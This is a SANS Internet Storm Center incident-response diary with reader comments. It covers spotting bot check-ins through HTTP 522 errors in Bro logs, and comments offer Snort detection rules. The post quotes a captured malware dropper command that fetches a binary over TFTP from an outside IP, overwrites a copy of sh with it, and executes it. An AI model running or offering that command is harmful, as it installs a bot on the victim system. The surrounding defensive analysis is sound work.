522 Error Code for the Win - SANS Internet Storm Center

522 Error Code for the Win
Recently I ran across a tweet from Packet Watcher @jinq102030 (https://twitter.com/jinq102030/status/756476442590842880) to keep an eye on HTTP error code 522 for possible malware check-ins. 522 code could mean several things, but as for IR it's a potential malicious host has been pulled offline and you have a client still trying to connect. So I got our Intern to check bro logs and see what he could find. >zcat http* \| bro-cut ts id.orig_h id.resp_h host status_code \| awk '$5 == "522" 1467159441.247406 192.128.1.216 104.27.182.19 - 522 1467160356.407366 192.128.1.216 104.27.183.19 - 522 1467161271.647320 192.128.1.216 104.27.183.19 - 522 1467163102.087490 192.128.1.216 104.27.183.19 - 522 1467164017.337316 192.128.1.216 104.27.183.19 - 522 1467164932.547084 192.128.1.216 104.27.182.19 - 522 …. 1467182323.201685 192.128.1.216 104.27.182.19 - 522 1467183238.447046 192.128.1.216 104.27.183.19 - 522 1467184153.641505 192.128.1.216 104.27.183.19 - 522 1467185068.903194 192.128.1.216 104.27.182.19 - 522 … There was other traffic that was false positives, but you could easily tell that this IP was checking this site on a regular basis. Out of 4GB of compressed bro logs for the day we only had about 200 total lines that matched, so very low noise ratio. When looking at the full packet capture of the system in question, we were able to tell that the system in question was compromised and downloaded a bot . cd /tmp \|\| cd /var/ \|\| cd /dev/;busybox tftp -r min -g 91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh. This is certainly something we are going to keep looking at for finding more compromised system. -- Tom Webb @twsecblog	Tom 59 Posts ISC Handler Aug 17th 2016
Thread locked Subscribe	Aug 17th 2016 5 years ago
Hi That is a nice thing to check for. I made a SNORT IDS rule for that. alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"NF - Error 522 - Connection timed out - Check client for compromise"; content:"522"; http_stat_code; reference:url,isc.sans.edu/forums/diary/522+Error+Code+for+the+Win/21377/; reference:url,networkforensic.dk; metadata:18082016; priority:2; sid:6001948; rev:1;) Happy hunting Lenny	Anonymous
Quote	Aug 19th 2016 5 years ago
Oh nice signature, may I respectfully recommend flow:established,from_server and classtype:bad-unknown? alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"NF - Error 522 - Connection timed out - Check client for compromise"; flow:established,from_server; content:"522"; http_stat_code; reference:url,isc.sans.edu/forums/diary/522+Error+Code+for+the+Win/21377/; reference:url,networkforensic.dk; classtype:bad-unknown; metadata:18082016; priority:2; sid:6001948; rev:2;) Cheers, Nathan Fowler	Anonymous
Quote	Aug 26th 2016 5 years ago

Recently I ran across a tweet from Packet Watcher @jinq102030 (https://twitter.com/jinq102030/status/756476442590842880) to keep an eye on HTTP error code 522 for possible malware check-ins. 522 code could mean several things, but as for IR it's a potential malicious host has been pulled offline and you have a client still trying to connect. So I got our Intern to check bro logs and see what he could find.

>zcat http* | bro-cut ts id.orig_h id.resp_h host status_code | awk '$5 == "522"

1467159441.247406 192.128.1.216 104.27.182.19 - 522
1467160356.407366 192.128.1.216 104.27.183.19 - 522
1467161271.647320 192.128.1.216 104.27.183.19 - 522
1467163102.087490 192.128.1.216 104.27.183.19 - 522
1467164017.337316 192.128.1.216 104.27.183.19 - 522
1467164932.547084 192.128.1.216 104.27.182.19 - 522
….
1467182323.201685 192.128.1.216 104.27.182.19 - 522
1467183238.447046 192.128.1.216 104.27.183.19 - 522
1467184153.641505 192.128.1.216 104.27.183.19 - 522
1467185068.903194 192.128.1.216 104.27.182.19 - 522
…

There was other traffic that was false positives, but you could easily tell that this IP was checking this site on a regular basis. Out of 4GB of compressed bro logs for the day we only had about 200 total lines that matched, so very low noise ratio.

When looking at the full packet capture of the system in question, we were able to tell that the system in question was compromised and downloaded a bot .

cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g 91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh.

This is certainly something we are going to keep looking at for finding more compromised system.

--

Tom Webb

@twsecblog

Tom

59 Posts
ISC Handler

Aug 17th 2016

Hi
That is a nice thing to check for.

I made a SNORT IDS rule for that.

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"NF - Error 522 - Connection timed out - Check client for compromise"; content:"522"; http_stat_code; reference:url,isc.sans.edu/forums/diary/522+Error+Code+for+the+Win/21377/; reference:url,networkforensic.dk; metadata:18082016; priority:2; sid:6001948; rev:1;)

Happy hunting
Lenny

Anonymous

Oh nice signature, may I respectfully recommend flow:established,from_server and classtype:bad-unknown?

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"NF - Error 522 - Connection timed out - Check client for compromise"; flow:established,from_server; content:"522"; http_stat_code; reference:url,isc.sans.edu/forums/diary/522+Error+Code+for+the+Win/21377/; reference:url,networkforensic.dk; classtype:bad-unknown; metadata:18082016; priority:2; sid:6001948; rev:2;)

Cheers,
Nathan Fowler

Anonymous